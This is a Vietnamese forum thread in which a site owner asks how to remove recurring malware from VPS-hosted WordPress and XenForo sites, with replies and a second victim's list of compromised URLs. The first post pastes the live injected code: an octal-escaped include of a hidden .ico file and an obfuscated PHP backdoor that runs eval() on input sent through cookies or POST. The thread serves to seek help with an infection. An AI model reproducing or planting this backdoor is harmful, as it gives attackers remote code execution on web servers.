Xin giúp đỡ VPS bị virus .php.suspected


(DannyTuan) #1

Xin chào !

VPS của mình mua tại vultr và digitalocean.
Mình sử dụng gồm 3 website : 1 xenforo, 1 wordpress & 1 php tự code.

Lúc vừa cài đặt xong vps và hocvps script thì mọi thứ bình thường. Nhưng khoảng 1 tuần là gặp rắc rối với con virus này. Mình ko biết nên gọi nó là virus hay malware nữa.

File index.php đổi thành index.php.suspected.
Trong file index.php sẽ thêm 1 đoạn ngay đầu :

/2d41f/

@include “\057h\157m\145/\146a\143e\142o\157k\056d\141n\156y\164u\141n\056c\157m\057p\165b\154i\143_\150t\155l\057a\163s\145t\163/\151m\141g\145s\057.\1416\067f\143d\1431\056i\143o”;

/2d41f/

Và sinh ra 1 file index.html để dẫn đến index.php.suspected.
Kèm theo rất nhiều file chứa config đều dính lỗi này hết.

Và sinh ra 1 cơ số file php có nội dung :

<?php $gyzhh = '-n3ymtxcv20dgH_79il64#s\'*abofu5re8pk';$ktppyxj = Array();$ktppyxj[] = $gyzhh[13].$gyzhh[24];$ktppyxj[] = $gyzhh[21];$ktppyxj[] = $gyzhh[19].$gyzhh[15].$gyzhh[2].$gyzhh[33].$gyzhh[20].$gyzhh[11].$gyzhh[10].$gyzhh[25].$gyzhh[0].$gyzhh[28].$gyzhh[33].$gyzhh[9].$gyzhh[30].$gyzhh[0].$gyzhh[20].$gyzhh[15].$gyzhh[19].$gyzhh[28].$gyzhh[0].$gyzhh[26].$gyzhh[25].$gyzhh[9].$gyzhh[28].$gyzhh[0].$gyzhh[19].$gyzhh[33].$gyzhh[25].$gyzhh[15].$gyzhh[33].$gyzhh[26].$gyzhh[32].$gyzhh[33].$gyzhh[16].$gyzhh[2].$gyzhh[11].$gyzhh[16];$ktppyxj[] = $gyzhh[7].$gyzhh[27].$gyzhh[29].$gyzhh[1].$gyzhh[5];$ktppyxj[] = $gyzhh[22].$gyzhh[5].$gyzhh[31].$gyzhh[14].$gyzhh[31].$gyzhh[32].$gyzhh[34].$gyzhh[32].$gyzhh[25].$gyzhh[5];$ktppyxj[] = $gyzhh[32].$gyzhh[6].$gyzhh[34].$gyzhh[18].$gyzhh[27].$gyzhh[11].$gyzhh[32];$ktppyxj[] = $gyzhh[22].$gyzhh[29].$gyzhh[26].$gyzhh[22].$gyzhh[5].$gyzhh[31];$ktppyxj[] = $gyzhh[25].$gyzhh[31].$gyzhh[31].$gyzhh[25].$gyzhh[3].$gyzhh[14].$gyzhh[4].$gyzhh[32].$gyzhh[31].$gyzhh[12].$gyzhh[32];$ktppyxj[] = $gyzhh[22].$gyzhh[5].$gyzhh[31].$gyzhh[18].$gyzhh[32].$gyzhh[1];$ktppyxj[] = $gyzhh[34].$gyzhh[25].$gyzhh[7].$gyzhh[35];foreach ($ktppyxj[7]($_COOKIE, $_POST) as $gfqjt => $ioeos){function aazwq($ktppyxj, $gfqjt, $oudff){return $ktppyxj[6]($ktppyxj[4]($gfqjt . $ktppyxj[2], ($oudff / $ktppyxj[8]($gfqjt)) + 1), 0, $oudff);}function nxhcc($ktppyxj, $avsdjg){return @$ktppyxj[9]($ktppyxj[0], $avsdjg);}function bsecok($ktppyxj, $avsdjg){$kkmojoc = $ktppyxj[3]($avsdjg) % 3;if (!$kkmojoc) {eval($avsdjg[1]($avsdjg[2]));exit();}}$ioeos = nxhcc($ktppyxj, $ioeos);bsecok($ktppyxj, $ktppyxj[5]($ktppyxj[1], $ioeos ^ aazwq($ktppyxj, $gfqjt, $ktppyxj[8]($ioeos))));}

Mình đã từng thử. Xoá hết toàn bộ code, database.
Cài đặt lại wordpress, xenforo bản chuẩn từ trang chính. Chứ ko dùng xenforo nulled luôn. Tất cả plugin wordpress đều hàng premium. Nhưng chỉ sau khoảng 1 tuần thì đâu lại vào đấy.

Mong các bạn có ai từng gặp trường hợp này và đã fix được thì giúp mình với. Mình đã từng dùng thử chương trình diệt malware, virus của hocvps hướng dẫn nhưng vẫn chả ăn nhập gì với nó.

Mình sử dụng auto backup google drive. Thì khi download xuống cũng không được vì google quét ra virus nó ko cho download file backup luôn.

Chân thành cảm ơn mọi người !


(duy) #2

bạn chạy 1 vps 1 code hay nhiều code 1 vps, nhiều code thì coi chừng bị local hack, chạy 1 code thì coi chừng mã độc trong code


(DannyTuan) #3

1 VPS mình chạy cho 3 code luôn ạ.
Mỗi code 1 domain riêng.
Mình cài mới toàn bộ chứ ko dùng bất cứ code share hay nulled.
Nên mình nghĩ từ đầu là ko có. Mình đã thử dùng wordpress trắng. Rồi bỏ đó tầm 2 tuần cũng vẫn dính :frowning:

Mình thử dùng ClamAV qúet nhưng chẳng quét ra con malware nào. Mặc dù nó nằm đầy ở các root từng domain luôn :frowning:


(duy) #4

3 code của bạn có chắc là không có mã độc không? nếu cài mới wordpress thì cài mới vps luôn cho chắc rồi hẵng cài code


(DannyTuan) #5

Mỗi lần cài mới.
Mình đều xoá VPS cũ. Sau đó tạo VPS mới trên vultr. Cài đặt hocvps script.
Sau đó add domain, database rồi mới download wordpress, xenforo về cài đặt.
Và mình nghĩ source mình sử dụng là từ nguồn chính, xenforo cũng mua license nên chắc chắn không phải do code đó rồi.

Vấn đề ở đây là mình đang cần 1 phần mềm nào đó có thể quét được mã độc để mình xoá bỏ hết chúng. Và cần có cách bảo mật lại vps ạ !


#6

cho mình hỏi thêm web https://hopdaithanh.com của mình có rất nhiều file .php.suspected và grid-metaclass.php
ko biết file này có phải của wp hay do virus tự cài vào nhỉ (web của mình đang bị Google) cảnh báo bị tấn công)

Google thông báo:

Dưới đây là một số URL ví dụ mà chúng tôi phát hiện thấy các trang đã bị xâm phạm. Hãy xem lại chúng để biết rõ hơn vị trí mà nội dung bị tấn công này xuất hiện. Danh sách này không đầy đủ đầy đủ.
http://hopdaithanh.com/index4.php?yhsw=
http://hopdaithanh.com/index4.php?yhsw=kaley-cuoco-ranch
http://hopdaithanh.com/index4.php?yhsw=ns-refund